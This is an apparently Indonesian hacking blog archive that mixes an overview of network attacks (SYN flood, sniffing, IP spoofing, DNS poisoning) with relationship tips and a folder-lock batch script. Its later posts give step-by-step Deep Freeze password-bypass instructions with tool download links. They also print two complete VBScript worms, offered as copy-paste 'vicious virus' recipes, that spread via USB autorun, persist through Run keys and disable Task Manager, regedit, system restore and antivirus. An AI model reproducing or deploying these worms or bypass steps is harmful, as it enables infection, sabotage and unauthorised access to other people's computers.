h4ry0-c0mun1ty

Jenis-jenis Ancaman Jaringan

2011-01-12T23:10:00.000-08:00

Berikut ini akan dijelaskan beberapa tipe-tipe serangan yang dapat dilancarkan oleh pihak-pihak tertentu terhadap sebuah jaringan komputer:

*DOS/DDOS

Denial of Services dan Distributed Denial of Services adalah sebuah metode serangan yang bertujuan untuk menghabiskan sumber daya sebuah peralatan jaringan komputer sehingga layanan jaringan komputer menjadi terganggu. Salah satu bentuk serangan ini adalah 'SYN Flood Attack', yang mengandalkan kelemahan dalam sistem 'three-way-handshake'. 'Three-way-handshake' adalah proses awal dalam melakukan koneksi dengan protokol TCP. Proses ini dimulai dengan pihak klien mengirimkan paket dengan tanda SYN. Lalu kemudian pihak server akan menjawab dengan mengirimkan paket dengan tanda SYN dan ACK. Terakhir, pihak klien akan mengirimkan paket ACK.

Setelah itu, koneksi akan dinyatakan terbuka, sampai salah satu pihak mengirimkan paket FIN atau paket RST atau terjadi connection time-out. Dalam proses 'three-way-handshake', selain terjadi inisiasi koneksi, juga terjadi pertukaran data-data parameter yang dibutuhkan agar koneksi yang sedang dibuat dalam berjalan dengan baik. Dalam serangan ini, sebuah host akan menerima paket inisiasi koneksi (Paket dengan flag SYN) dalam jumlah yang sangat banyak secara terus menerus. Akibatnya host yang sedang diserang akan melakukan alokasi memori yang akan digunakan untuk menerima koneksi tersebut dan karena paket inisiasi terus-menerus diterima maka ruang memori yang dapat digunakan untuk menerima koneksi akan habis. Karena semua ruang memori yang dapat digunakan untuk menerima koneksi sudah habis, maka ketika ada permintaan baru untuk melakukan inisiasi koneksi, host ini tidak dapat melakukan alokasi memori sehingga permintaan baru ini tidak dapat dilayani oleh host ini. Untuk menghindari pelacakan, biasanya paket serangan yang dikirimkan memiliki alamat IP sumber yang dipalsukan. Untuk menghadapi serangan seperti ini, sistem operasi – sistem operasi modern telah mengimplementasikan metode-metode penanganan, antara lain :

• Micro-blocks. Ketika ada sebuah host menerima paket inisiasi, maka host akan mengalokasikan ruang memori yang sangat kecil, sehingga host tersebut bisa menerima koneksi lebih banyak. Diharapkan ruang memori dapat menampung semua koneksi yang dikirimkan, sampai terjadi connection-time-out, dimana koneksi-koneksi yang stale, yaitu koneksi yang tidak menyelesaikan proses 'three-way-handshake' atau sudah lama tidak ada transaksi data, akan dihapuskan dari memori dan memberikan ruang bagi koneksi-koneksi baru. Metode ini tidak terlalu efektif karena bergantung pada kecepatan serangan dilakukan, apabila ternyata kecepatan paket serangan datang lebih cepat daripada lamanya waktu yang perlu ditunggu agar terjadi connection-time-out pada paket-paket yang stale, make ruang memori yang dapat dialokasikan akan tetap habis.

• SYN Cookies. Ketika menerima paket inisiasi, host penerima akan mengirimkan paket tantangan yang harus dijawab pengirim, sebelum host penerima mengalokasikan memori yang dibutuhkan. Tantangan yang diberikan adalah berupa paket SYN-ACK dengan nomor urut khusus yang merupakan hasil dari fungsi hash dengan input alamat IP pengirim, nomor port, dll. Jawaban dari pengirim akan mengandung nomor urut tersebut. Tetapi untuk melakukan perhitungan hash membutuhkan sumber-daya komputasi yang cukup besar, sehingga banyak server-server yang aplikasinya membutuhkan kemampuan komputasi tinggi tidak mempergunakan metode ini. Metode ini merubah waktu peng-alokasian memori, yang tadinya pada awal dari proses 'threeway-handshake', menjadi diakhir dari proses tersebut. (notes: pada standard TCP/IP yang baru, ditentukan bahwa diperlukan cara yang lebih baik untuk menentukan urut paket, sehingga sulit untuk ditebak. Jadi kemungkinan secara default, metode ini akan digunakan pada seluruh peralatan jaringan komputer atau sistem operasi yang ada).

• RST Cookies. Mirip dengan SYN Cookies, hanya tantangan yang dikirimkan host penerima ke pengirim adalah sebuah paket yang salah. Apabila pengirim adalah pengirim yang valid, maka pengirim akan mengirimkan paket RST lalu mengulang kembali koneksi. Ketika penerima menerima paket RST, host tersebut tahu bahwa pengirim adalah valid dan akan menerima koneksi dari pengirim dengan normal. Karena ada masalah dengan implementasi lapisan TCP/IP, metode ini kemungkinan tidak kompatibel dengan beberapa sistem operasi. Metode ini merubah waktu pengalokasian memori, yang tadinya pada awal dari proses 'three-way-handshake', menjadi diakhir dari proses tersebut.

*Packet Sniffing

Packet Sniffing adalah sebuah metode serangan dengan cara mendengarkan seluruh paket yang lewat pada sebuah media komunikasi, baik itu media kabel maupun radio. Setelah paket-paket yang lewat itu didapatkan, paket-paket tersebut kemudian disusun ulang sehingga data yang dikirimkan oleh sebuah pihak dapat dicuri oleh pihak yang tidak berwenang. Hal ini dapat dilakukan karena pada dasarnya semua koneksi ethernet adalah koneksi yang bersifat broadcast, di mana semua host dalam sebuah kelompok jaringan akan menerima paket yang dikirimkan oleh sebuah host. Pada keadaan normal, hanya host yang menjadi tujuan paket yang akan memproses paket tersebut sedangkan host yang lainnya akan mengacuhkan paketpaket tersebut. Namun pada keadaan tertentu, sebuah host bisa merubah konfigurasi sehingga host tersebut akan memproses semua paket yang dikirimkan oleh host lainnya. Cukup sulit untuk melindungi diri dari gangguan ini karena sifat dari packet sniffing yang merupakan metode pasif (pihak penyerang tidak perlu melakukan apapun, hanya perlu mendengar saja). Namun ada beberapa hal yang bisa dilakukan untuk mengatasi hal ini, yaitu:

Secara rutin melakukan pemeriksaan apakah ada host di jaringan kita yang sedang dalam mode promiscuous, yaitu sebuah mode dimana host tersebut akan memproses semua paket yang diterima dari media fisik. Akan tetapi hal ini hanya akan melindungi diri kita terhadap packet sniffer yang berada pada satu kelompok jaringan dengan kita. Penyerang yang melakukan sniffing dari luar jaringan komputer kita tidak akan terdeteksi dengan menggunakan metode ini.

• Mempergunakan SSL atau TLS dalam melakukan pengiriman data. Ini tidak akan mencegah packet sniffer untuk mencuri paket yang dikirimkan, akan tetapi paket-paket yang dicuri tidak bisa dipergunakan karena dikirimkan dengan menggunakan format yang terenkripsi.

• Melakukan koneksi VPN, sehingga tetap bisa mempergunakan aplikasi yang tidak mendukung SSL atau TLS dengan aman.

Packet Sniffing sebagai tools pengelola jaringan.
Sebenarnya selain sebagai menjadi alat untuk melakukan kejahatan, packet sniffer juga bisa digunakan sebagai alat pertahanan. Dengan melakukan analisa paket-paket yang melalui sebuah media jaringan komputer, pengelola dapat mengetahui apabila ada sebuah host yang mengirimkan paket-paket yang tidak normal, misalnya karena terinfeksi virus. Sebuah IDS juga pada dasarnya adalah sebuah packet sniffer yang bertugas untuk mencari host yang mengirimkan paket-paket yang berbahaya bagi keamanan. Selain itu packet sniffer juga bisa menjadi alat untuk melakukan analisa permasalahan yang sedang dihadapi sebuah jaringan komputer. Misalkan ketika sebuah host tidak dapat berhubungan dengan host lainnya yang berada pada kelompok jaringan yang berbeda, maka dengan packet sniffer, pengelola jaringan komputer dapat melakukan penelusuran dimana permasalahan koneksi itu terletak.

*IP Spoofing

IP Spoofing adalah sebuah model serangan yang bertujuan untuk menipu seseorang. Serangan ini dilakukan dengan cara mengubah alamat asal sebuah paket, sehingga dapat melewati perlindungan firewall dan menipu host penerima data. Hal ini dapat dilakukan karena pada dasarnya alamat IP asal sebuah paket dituliskan oleh sistem operasi host yang mengirimkan paket tersebut. Dengan melakukan raw-socket-programming, seseorang dapat menuliskan isi paket yang akan dikirimkan setiap bit-nya sehingga untuk melakukan pemalsuan data dapat dilakukan dengan mudah.

Salah satu bentuk serangan yang memanfaatkan metode IP Spoofing adalah 'man-in-the-middleattack'. Pada serangan ini, penyerang akan berperan sebagai orang ditengah antara dua pihak yang sedang berkomunikasi. Misalkan ada dua pihak yaitu pihak A dan pihak B lalu ada penyerang yaitu C. Setiap kali A mengirimkan data ke B, data tersebut akan dicegat oleh C, lalu C akan mengirimkan data buatannya sendiri ke B, dengan menyamar sebagi A. Paket balasan dari B ke A juga dicegat oleh C yang kemudian kembali mengirimkan data 'balasan' buatannya sendiri ke A. Dengan cara ini, C akan mendapatkan seluruh data yang dikirimkan antara A dan B, tanpa diketahui oleh A maupun C. Untuk mengatasi serangan yang berdasarkan IP Spoofing, sebuah sistem operasi harus dapat memberikan nomor-urut yang acak ketika menjawab inisiasi koneksi dari sebuah host. Dengan nomor urut paket yang acak, akan sangat sulit bagi seorang penyerang untuk dapat melakukan pembajakan transmisi data.

Selain itu, untuk mengatasi model serangan 'man-in-the-middle-attack', perlu ada sebuah metode untuk melakukan otentikasi host yang kita hubungi. Otentikasi dapat berupa digitalcertificate yang eksklusif dimiliki oleh host tersebut. Konfigurasi firewall yang tepat juga dapat meningkatkan kemampuan jaringan komputer dalam menghadapi IP Spoofing. Firewall harus dibuat agar dapat menolak paket-paket dengan alamat IP sumber jaringan internal yang masuk dari interface yang terhubung dengan jaringan eksternal.

*DNS Forgery

Salah satu cara yang dapat dilakukan oleh seseorang untuk mencuri data-data penting orang lain adalah dengan cara melakukan penipuan. Salah satu bentuk penipuan yang bisa dilakukan adalah penipuan data-data DNS. DNS adalah sebuah sistem yang akan menterjemahkan nama sebuah situs atau host menjadi alamat IP situs atau host tersebut. Cara kerja DNS cukup sederhana, yaitu sebuah host mengirimkan paket (biasanya dengan tipe UDP) yang pada header paket tersebut berisikan alamat host penanya, alamat DNS resolver, pertanyaan yang diinginkan serta sebuah nomor identitas. DNS resolver akan mengirimkan paket jawaban yang sesuai ke penanya. Pada paket jawaban tersebut terdapat nomor identitas, yang dapat dicocokkan oleh
penanya dengan nomor identitas yang dikirimnya. Oleh karena cara kerja yang sederhana dan tidak adanya metode otentikasi dalam sistem komunikasi dengan paket UDP, maka sangat memungkinkan seseorang untuk berpura-pura menjadi DNS resolver dan mengirimkan paket jawaban palsu dengan nomor identitas yang sesuai ke penanya sebelum paket jawaban dari DNS resolver resmi diterima oleh penanya. Dengan cara ini, seorang penyerang dapat dengan mudah mengarahkan seorang pengguna untuk melakukan akses ke sebuah layanan palsu tanpa diketahui pengguna tersebut. Sebagai contoh, seorang penyerang dapat mengarahkan seorang pengguna Internet Banking untuk melakukan akses ke situs Internet Banking palsu yang dibuatnya untuk mendapatkan data-data pribadi dan kartu kredit pengguna tersebut.

Untuk dapat melakukan gangguan dengan memalsukan data DNS, seseorang membutuhkan informasi-informasi di bawah ini :

• Nomor identitas pertanyaan (16 bit)
• Port tujuan pertanyaan
• Alamat IP DNS resolver
• Informasi yang ditanyakan
• Waktu pertanyaan.

Pada beberapa implementasi sistem operasi, informasi diatas yang dibutuhkan seseorang untuk melakukan penipuan data DNS bisa didapatkan. Kunci dari serangan tipe ini adalah, jawaban yang diberikan DNS resolver palsu harus diterima oleh penanya sebelum jawaban yang sebenarnya diterima, kecuali penyerang dapat memastikan bahwa penanya tidak akan menerima jawaban yang sebenarnya dari DNS resolver yang resmi.

* DNS Cache Poisoning

Bentuk lain serangan dengan menggunakan DNS adalah DNS Cache Poisoning. Serangan ini memanfaatkan cache dari setiap server DNS yang merupakan tempat penyimpanan sementara data-data domain yang bukan tanggung jawab server DNS tersebut. Sebagai contoh, sebuah organisasi 'X' memiliki server DNS (ns.x.org) yang menyimpan data mengenai domain 'x.org'. Setiap komputer pada organisasi 'X' akan bertanya pada server 'ns.x.org' setiap kali akan melakukan akses Internet. Setiap kali server ns.x.org menerima pertanyaan diluar domain 'x.org', server tersebut akan bertanya pada pihak otoritas domain. Setelah mendapatkan jawaban yang dibutuhkan, jawaban tersebut akan disimpan dalam cache, sehingga jika ada pertanyaan yang sama, server 'ns.x.org' dapat langsung memberikan jawaban yang benar. Dengan tahapantahapan tertentu, seorang penyerang dapat mengirimkan data-data palsu mengenai sebuah domain yang kemudian akan disimpan di cache sebuah server DNS, sehingga apabila server tersebut menerima pertanyaan mengenai domain tersebut, server akan memberikan jawaban yang salah. Patut dicatat, bahwa dalam serangan ini, data asli server DNS tidak mengalami perubahan sedikitpun. Perubahan data hanya terjadi pada cache server DNS tersebut.

Cara yang paling efektif dalam menghadapi serangan yang merubah DNS server adalah dengan melakukan otentikasi host yang akan kita hubungi. Model otentikasi yang banyak digunakan saat ini adalah dengan mempergunakan digital certificate. Dengan digital certificate, seseorang dapat dengan yakin bahwa host yang dia akses adalah host yang sebenarnya.

Net Cut V.2 untuk mengshutdown komputer lain dalam satu jaringan

2010-12-20T01:41:00.000-08:00

Oke ..langsung saja ..Saya mau bagi-bagi program kecil yang bernama NetCut v2.0 untuk seorang admin komputer di warnet atau Administrator di sebuah perusahaan yang mempunyai jaringan Net yang kecil.. Program di instal di Server yang membawahi langsung User-user di jaringan...

..Jadi ini program berguna untuk Mematikan komputer user yang ingin kita ShutDown tetapi bisa kita hidupkan kembali.. tapi ingat program ini jangan disalah gunakan.. lagipula sudah ada juga program AntiNetcut untuk mencegah serangan program NetCut ini.. dan program ini mudah untuk digunakan.. Lihat gambar di bawah ini..

NetCut Versi 2.0

Untuk mendowload => DownLoad NetCut v2.0 Now...

Cara mudah membobol Deep Freez v.6

2010-12-18T00:17:00.000-08:00

sesuai dengan dinamika dan perkembangan jaman – banyak tips dan tools baru bermunculan ternyata termasuk juga untuk teknik untuk menjebol password Deep Freeze. Jika sebelumnya ada unfreezer untuk Deepfreeze 5 tetapi reset password harus dilakukan secara manual untuk Deepfreeze 6, maka sekarang ini beberapa tools penjebol password bahkan sudah bisa dipake untuk mereset password Deep Freeze versi 6 dengan sedemikian mudah dan cepat.

Kalau anda admin warnet dan sebangsanya, saya sarankan anda mengikuti perkembangan ini, karena tools ini benar-benar lumayan mengerikan. Bahkan kesan saya malah lebih mak nyus dari Unfreezer untuk DF 5.

Ada dua tools setidaknya setahu saya yang bisa dipakai untuk menjebol password DF 6 nyaris dengan seketika tanpa perlu susah payah. Ngeri deh

TOOLS PERTAMA bernama Anti Deepfreeze, kelihatannya karya programmer Arab.

Tampilannya seperti ini :

Cara menggunakannya sangat mudah, Tinggal pilih versi Deepfreeze lalu klik tombol Apply. Kemudian klik gambar icon Deepfreeze di taskbar ( Ctrl + Shift ) sambil klik icon .

Jika ada kotak password biarkan kosong, langsung masuk saja. Anda akan dibiarkan masuk konfigurasi Deepfreeze tanpa password

TOOLS KEDUA bernama Uninstall Deepfreeze, karya programmer Vietnam. Kalo program sebelumnya pake bahasa Inggris , program yang ini berbahasa Vietnam.

Tampilannya seperti ini :

Cara memakainya juga mudah meskipun berbahasa Vietnam, klik tombol Login, sampai tombol Login tidak aktif dan tombol Crack berubah menjadi aktif. Kemudian klik tombol Crack.

Langkah selanjutnya sama. Masuk ke file konfigurasi DeepFreeze dengan Ctrl+ Shift + klik icon DF atau cara lain. Bila ada kotak password abaikan, langsung masuk saja.

Semua cara ini dilakukan di Normal Windows, tetapi memang butuh restart komputer.
Sekali lagi, karena potensi dua tools ini agak tidak mengenakkan buat admin warnet cs, saya himbau rekan2 admin lebih memperhatikan masalah ini dengan menambah proteksi DF dengan tools yang lain. Meskipun
memang yang namanya program apapun tetap ada kemungkinan ditembus passwordnya.

=================================================================

Download dua tools tersebut di sini

DOWNLOAD via HACKCENTER

Gunakanlah alat bantu ini dengan bijaksana.

Bukan cuma admin, user warnet juga sebaiknya berhati-hati karena aneka script, virus, keylogger, program aneh-aneh bisa dimasukkan oleh siapa saja di warnet-warnet. Alamax daku sendiri bisa ikutan pusing kalo main di warnet.

Tips untuk menjadi setia untuk pasangan kita ^_^

2010-12-17T23:44:00.000-08:00

Setiap kita tentunya ingin menjadi pendamping yang baik bagi pasangan. Nah, apakah selama ini kita sudah menyempatkan diri untuk membenahi sikap agar dapat menjadi pendamping yang dibutuhkan oleh pasangan? Yuk lakukan beberapa cara berikut agar hubungan dengan pasangan jadi lebih solid.

Jika selama ini Anda merasa telah memperlakukan pasangan dengan buruk, di bawah ini ada beberapa cara yang bisa membantu Anda memperbaikinya. Kuncinya sederhana saja kok! Jika Anda ingin menjadi yang terbaik bagi orang lain, Anda pun harus belajar menjadi yang terbaik bagi diri sendiri.

1. Jangan Remehkan Diri Sendiri
Jangan pernah mengatakan Anda bukan yang terbaik bagi pasangan. Sekarang bagaimana dapat dihargai jika Anda sendiri tidak berusaha untuk menaikkan harga diri Anda sendiri. Satu hal, jangan pernah menyalahkan diri sendiri atas kesalahan di masa lalu karena hal tersebut dapat menghambat Anda untuk mencoba sesuatu yangbaru dan menghambat keberhasilan Anda di masa yang akan datang.

2. Landasi Hubungan dengan Kejujuran
Tidak ada satupun hubungan yang sukses jika dibangun dengan kebohongan. Sekali pun pasangan tidak pernah mencari tahu kebenarannya ucapan atau tindakan Anda, namun kebohongan bisa mempengaruhi hubungan Anda berdua.

3. Lakukan Hal yang Membahagiakan
Coba ingat, berapa kali Anda melakukan hal yang Anda tak sukai hanya untuk menyenangkan atau membahagiakan pasangan. Padahal, jika Anda menyadari, setiap kali Anda melakukan cara itu, sebagian cinta Anda untuk pasangan telah mati.

4. Jangan Pernah Mengecilkan Pasangan
Setiap orang pernah berbuat salah dalam hidupnya dan setiap orang bekerja pada ritme yang berbeda. Jika Anda selalu menghabiskan waktu untuk mengomeli pasangan hanya karena masalah sepele yang menurut Anda keliru, bagaimana Anda dapat mengharapkan pasangan melakukan sesuatu yang benar.

5. Jangan Batalkan yang Telah Anda Janjikan
Kepercayaan sangat penting bagi setiap hubungan. Jika Anda telah menjanjikan sesuatu kemudian Anda batalkan secara sepihak, pasangan pun akan sulit mempercayai Anda kembali.

6. Ciptakan Keromantisan
Salah satu indikator kegagalan hubungan adalah kurangnya romantisme. Memang tak semua manusia diciptakan memiliki sifat romantis yang tinggi. Namun untuk mempertahankan hubungan, romantisme sebenarnya bisa dipelajari. Tak harus dengan bunga untuk menunjukkan keromantisan Anda. Sekadar kecupan yang spontan juga dapat dimasukkan ke dalam kategori romantis.

7. Selalu Ada Bagi Pasangan
Tidak ada yang lebih penting dalam hidup Anda selain bisa menjalani hidup bersama pasangan. Teman bisa datang dan pergi, tetapi pasangan akan selalu bersama Anda untuk seluruh perjalanan hidup. Jika pasangan sedang memiliki masalah atau memerlukan Anda, tidak ada cara lain, Anda harus berada di sampingnya.

8. Komunikasi
Ini merupakan salah satu kunci utama untuk mendapatkan hubungan yang langgeng. Tak ada masalah yang tak terselesaikan jika didasari dengan komunikasi. Bicarakan segala hal yang menyangkut hubungan Anda berdua, mulai masalah uang hingga urusan ranjang. Niscaya, takkan ada ganjalan di dalam perjalanan Anda.

9. Perlakukan Pasangan Dengan Sopan
Panggilah namanya dengan sopan. Janga berteriak, apalagi jika di hadapan banyak orang. Jangan pula perlakukan pasangan dengan tidak baik, melebihi cara Anda memperlakukan teman baik Anda. Junjung tinggi keberadaannya di mana saja Anda berada.

10. Hormati dan Jaga Perasaannya
Adalah kodrat Anda sebagai wanita untuk mendampingi pasangan. Jadi, hormati dia sebagai pasangan hidup Anda dan jangan bongkar kejelekannya di hadapan keluarga apalagi teman-teman Anda. Kuncinya, seburuk apapun pasangan di mata Anda, tapi ia harus tetap menjadi yang terbaik di hadapan orang lain.

nih buat yang mencoba setia dan terus berusaha untuk setia

Cara membuat viruz ganas

2010-12-17T17:49:00.000-08:00

ini scriptnya kopi di notepad ea ^_^

‘El Magnifico MAN
on error resume next

dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe erwinda_putra.exe.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\erwinda_putra.exe.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path “A:” then
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\erwinda_putra.exe.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\erwinda_putra.exe.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\erwinda_putra.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,”"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3″
if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

do while year(now) >= 2008
WScript.sleep 20000

msgbox “salamaik tibo di virus camp_luck” & vbcrlf & _
“ondeh sanak maaf stek yo awak masuak ka sistem sanak anok-anok” & vbcrlf & _
“dunsanak komputer dunsanak awak kuasai stek dih. kini dunsanak masuak dalam permainan suruak manyuruan” & vbcrlf & _
“iko permainan yang paten ma dunsanak” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok selah dih dunsanak beko tajadi yang indak-indak ko” & vbcrlf & vbcrlf & _
” aaa kini saaiknyo ma dunsanak”

loop
di save dengan format .VBS

Cara membuat Folder lock

2010-12-17T17:43:00.000-08:00

@ECHO OFF
echo -----------------------------
echo Locker Folder by masyarakat ^_^
echo Haryo Production
echo -----------------------------
title Folder SaveLocker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST KayzzLocker goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(iyo/ndak)
set/p "cho=>"
if %cho%==iyo goto LOCK
if %cho%==iyo goto LOCK
if %cho%==ndak goto END
if %cho%==ndak goto END
echo Invalid choice.
goto CONFIRM
: LOCK
ren KayzzLocker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%== PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" KayzzLocker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md KayzzLocker
echo KayzzLocker created successfully
goto End
:End

3. Setting Password
Ganti tulisan PASSWORD HERE dengan password yang anda inginkan (password dilarang
mengunakan spasi)

4. Save Notepad Program
save dan kemudian ganti extensinya dari *.TXT menjadi *.BAT
Misal :saveLocker.txt menjadi saveLocker.bat

Cara Kerja :
1. Double click file *.BAT yang tadi baru kita buat lalu akan muncul sebuah folder baru
bernama KayzzLocker
2. Masukkan data-data penting anda ke dalam folder tersebut
3. Jika sudah selesai close forder tersebut lalu buka kembali file *.BAT dan akan muncul tulisan
”Are you sure you want to lock the folder(iyo/ndak)”
4. Kemudian ketik iyo/iyo untuk mengunci locker atau ndak/ndak untuk batal

MEMBUAT SEDERHANA VIRUS DENGAN MEMAKAI NOTEPAD

2010-12-17T17:39:00.000-08:00

1. Buka Notepad
2. Copy kan kode dibawah ini:

on error resume next

dim rekur,syspath,windowpath,desades,
longka,mf,isi,tf,F0nAb0530,nt,check,sd

isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe Mila.sys.vbs”

set longka = createobject(“Scripting.FileSystemObject”)

set mf = longka.getfile(Wscript.ScriptFullname)

dim text,size

size = mf.size

check = mf.drive.drivetype

set text = mf.openastextstream(1,-2)

do while not text.atendofstream

rekur = rekur & text.readline

rekur = rekur & vbcrlf

loop

do

Set windowpath = longka.getspecialfolder(0)

Set syspath = longka.getspecialfolder(1)

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 32

set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)

tf.write rekur

tf.close

set tf = longka.getfile(syspath & “\recycle.vbs”)

tf.attributes = 39

for each desades in longka.drives

If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path “A:” then

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes =32

set tf=longka.createtextfile(desades.path &”\Mila.sys.vbs”,2,true)

tf.write rekur

tf.close

set tf=longka.getfile(desades.path &”\Mila.sys.vbs”)

tf.attributes = 39

set tf =longka.getfile(desades.path &”\autorun.inf”)

tf.attributes = 32

set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)

tf.write isi

tf.close

set tf = longka.getfile(desades.path &”\autorun.inf”)

tf.attributes=39

end if

next

set F0nAb0530 = createobject(“WScript.Shell”)

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: F0nA ::”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”,2, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore\DisableSR”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, “1″, “REG_DWORD”

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a”, “F0nAb0530-X2/1″

F0nAb0530.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\MRUList”, “a”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “F0nAb0530-X2″

F0nAb0530.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText”, “Aku Sayang Mila”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Ageia”, syspath & “\recycle.vbs”

F0nAb0530.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.macancrew.net”

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger”,”“

F0nAb0530.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger”,”“

